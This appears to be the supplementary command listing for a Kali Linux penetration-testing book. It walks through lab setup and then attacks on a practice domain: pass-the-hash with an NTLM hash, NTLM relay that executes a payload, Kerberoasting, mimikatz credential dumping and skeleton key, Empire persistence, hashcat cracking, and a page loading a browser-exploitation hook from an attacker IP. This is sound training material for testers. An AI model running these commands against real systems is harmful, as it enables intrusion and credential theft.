The Ultimate Kali Linux Book - Supplementary Materials
Note
While the content and labs found within this audiobook are based on Kali Linux 2021,
the concepts and exercises are applicable to later versions of Kali Linux that will be
released in the future.
After completing this audiobook, equipped with your imagination and newfound skills,
attempt to create additional lab scenarios and even extend your lab environment by
adding additional virtual machines to improve your skillset. This will help you to
continue learning and further develop your skills as an aspiring ethical hacker and
penetration tester.
Vagrant: https://www.vagrantup.com/downloads
Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8
C:\Users\Slayer> cd .vagrant.d
C:\Users\Slayer\.vagrant.d> del Vagrantfile
C:\Users\Slayer\.vagrant.d> vagrant init metasploitable3-ub1404
C:\Users\Slayer\.vagrant.d> vagrant up
Command 2.10
Further reading
To learn more on the topics that were covered in this chapter, take a look at the
following resources:
Why secure web-based applications? https://hub.packtpub.com/why-secure-web-based-applications-with-kali-linux/
FreeRadius: https://freeradius.org/
A physical wireless router that supports the WEP, WPA2-Personal, and WPA2-Enterprise security standards
C:\Users\Administrator> cd\
C:\> mkdir CorporateFileShare
C:\> net share DataShare=c:\CorporateFileShare
Command 3.4
C:\Users\Administrator> setspn -a DC1/sqladmin.REDTEAMLAB.local:64123 REDTEAMLAB\sqladmin
Command 3.5
C:\Windows\system32> powershell
PS C:\Windows\system32> Add-Computer -DomainName RedTeamLab.local -Restart
Command 3.7
C:\Users\Administrator> cd \
C:\> mkdir SharedData
C:\> net share DataShare=c:\SharedData
Command 3.9
client 172.16.17.199 {
secret = radiuspassword1
shortname = CorpAP
}
Code 3.2
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
Active Directory Domain Services: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
Osintgram: https://github.com/Datalux/Osintgram
Sherlock: https://github.com/sherlock-project/sherlock
kali@kali:~$ recon-web
Command 4.10
kali@kali:~$ theHarvester -h
Command 4.11
kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
(venv)kali@kali:~/Osintgram$ sudo pip3 install -r requirements.txt
Command 4.15
Further reading
To learn more about open source intelligence, please go to https://hub.packtpub.com/open-source-intelligence/.
Chapter 5
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
Kali Linux 2021.2: https://www.kali.org/get-kali/
Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
S3Scanner: https://github.com/sa7mon/S3Scanner
kali@kali:~$ cd EyeWitness/Python/setup
kali@kali:~/EyeWitness/Python/setup$ sudo ./setup.sh
Command 5.11
kali@kali:~/EyeWitness/Python/setup$ cd ..
Command 5.12
kali@kali:~$ msfconsole
Command 5.29
msf6 > search smb_version
Command 5.30
kali@kali:~$ nslookup
> flaws.cloud
Command 5.42
kali@kali:~$ cd S3_Bucket
kali@kali:~/S3_Bucket$ ls -l
Command 5.47
Further reading
To learn more about what was covered in this chapter, take a look at the following
resources:
Why is DNSSEC important?: https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en
Nessus: https://www.tenable.com/products/nessus/nessus-essentials
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.3
https://www.first.org/cvss/calculator/3.0#
Command 6.4
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.5
Shellter: https://www.shellterproject.com/
Not all wireless cards support monitor mode and packet injection. However, making a
minor revision to a chipset can cause the card to not work in monitor mode, and some
cards may need the drivers to be compiled and may not work out of the box.
kali@kali:~$ msfconsole
Command 7.16
Further reading
To learn more about Airmon-ng, go to https://www.aircrack-ng.org/doku.php?id=airmon-ng.
Chapter 8
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
Kali Linux 2021.2: https://www.kali.org/get-kali/
Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8
kali@kali:~$ msfconsole
Command 8.21
Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
Code 8.1
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt
Command 8.28
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt --show
Command 8.29
kali@kali:~$ msfconsole
Command 8.30
kali@kali:~$ pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b //172.30.1.21 cmd
Command 8.39
kali@kali:~$ msfconsole
Command 8.43
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
Watering hole 101: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/137/watering-hole-101
C:\Windows\system32> cd\
C:\> dir
Command 9.4
C:\Users\vagrant\Downloads\master\PacketWhisper-master> python packetWhisper.py
Command 9.22
kali@kali:~$ cd PacketWhisper
kali@kali:~/PacketWhisper$ python packetWhisper.py
Command 9.23
Further reading
To learn more on the subject, check out the following resources:
Vulnerabilities in the application and transport layers: https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-layer-of-the-tcp-ip-stack/
hashcat: https://hashcat.net/hashcat/
PowerView: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Bloodhound: https://github.com/BloodHoundAD/BloodHound
C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -ExecutionPolicy bypass
Command 10.2
PS C:\Users\bob.REDTEAMLAB\Downloads> . .\PowerView.ps1
Command 10.3
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomain
Command 10.4
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainSID
S-1-5-21-634716346-3108032190-2057695417
Command 10.5
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainPolicy
Command 10.6
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomainController
Command 10.7
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetUser
Command 10.8
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetComputer
Command 10.9
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGroup
Command 10.10
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetLocalGroup -ComputerName dc1.redteamlab.local
Command 10.11
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-ShareFinder -Verbose
Command 10.12
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGPO
Command 10.13
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForest
Command 10.14
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestDomain
Command 10.15
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestCatalog
Command 10.16
PS C:\Users\bob.REDTEAMLAB\Downloads> Find-LocalAdminAccess -Verbose
Command 10.17
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-EnumerateLocalAdmin -Verbose
Command 10.18
C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -ExecutionPolicy bypass
Command 10.22
PS C:\Users\bob.REDTEAMLAB\Downloads> . .\SharpHound.ps1
Command 10.23
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-Bloodhound -CollectionMethod All -Domain redteamlab.local -ZipFileName redteamlab.zip
Command 10.24
C:\WINDOWS\system32> cd C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 5600 NTLMv2-hash.txt rockyou.txt -O
Command 10.26
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t 192.168.42.23 -smb2support
Command 10.31
kali@kali:~$ sudo msfconsole
Command 10.32
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t 192.168.42.23 -smb2support -e /home/kali/payload4.exe
Command 10.36
Further reading
To learn more about the topics that were covered in this chapter, visit the following
links:
Active Directory Domain Services Overview: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
Bloodhound documentation: https://bloodhound.readthedocs.io/en/latest/index.html
mitm6 – https://github.com/fox-it/mitm6
Mimikatz – https://github.com/gentilkiwi/mimikatz/releases
kali@kali:~$ cd mitm6
kali@kali:~/mitm6$ pip3 install -r requirements.txt
kali@kali:~/mitm6$ sudo python setup.py install
Command 11.2
kali@kali:~/mitm6$ cd mitm6
kali@kali:~/mitm6/mitm6$ python3 mitm6.py -h
Command 11.3
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -6 -t ldaps://192.168.42.22 -wh wpad.redteamlab.local -l /home/kali/mitm6-loot
Command 11.6
kali@kali:~$ ls mitm6-loot
Command 11.8
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 GetUserSPNs.py redteamlab.local/bob:Password1 -dc-ip 192.168.42.22 -request
Command 11.15
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 13100 TGS-hash.txt rockyou.txt -O
Command 11.16
kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ python3 -m http.server 8080
Command 11.17
mimikatz # sekurlsa::logonpasswords
Command 11.20
C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.22
C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.27
mimikatz # misc::cmd
Command 11.31
C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.32
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
Command 11.33
mimikatz # misc::cmd
Command 11.34
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> powershell
Command 11.35
PS C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> Enter-PSSession -Computername dc1 -credential redteamlab\Administrator
Command 11.36
[dc1]: PS C:\Users\Administrator\Documents>
Command 11.37
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/T1557/001/
Empire: https://github.com/BC-SECURITY/Empire
Starkiller: https://github.com/BC-SECURITY/Starkiller
(Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True
Command 12.40
(Empire: usemodule/powershell/persistence/elevated/schtasks) > set Listener ThreatEmulation
(Empire: usemodule/powershell/persistence/elevated/schtasks) > execute
Command 12.41
FreeRADIUS: https://freeradius.org/
airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon
Figure 13.1 – Wireless standards
/home/kali/enterprise-Corp_Wi-Fi/
Command 13.23
/home/kali/enterprise-Corp_Wi-Fi/enterprise_captured_john_<BSSID_value>_hashes.txt
Command 13.24
/usr/share/wordlists/rockyou.txt
Command 13.25
Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
Guidelines for Securing Wireless Local Area Networks (WLANs): https://csrc.nist.gov/publications/detail/sp/800-153/final
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
Social Engineering – https://www.imperva.com/learn/application-security/social-engineering-attack/
kali@kali:~$ hURL -8 "/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt"
Command 15.4
http://localhost:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg
Code 15.3
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
OWASP Top 10 – https://owasp.org/www-project-top-ten/
<html>
<head>
<title>Web Page</title>
<script src="http://<IP>:3000/hook.js"></script>
</head>
<body>
<h1>This is a vulnerable web page</h1>
<p>We are using browser exploitation.</p>
</body>
</html>
Code 16.4
Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
OWASP Top 10: https://owasp.org/www-project-top-ten/
OWASP Top 10 as a standard: https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_as_a_standard/
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
Rules of engagement: https://hub.packtpub.com/penetration-testing-rules-of-engagement/
CyberChef: https://gchq.github.io/CyberChef/
PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings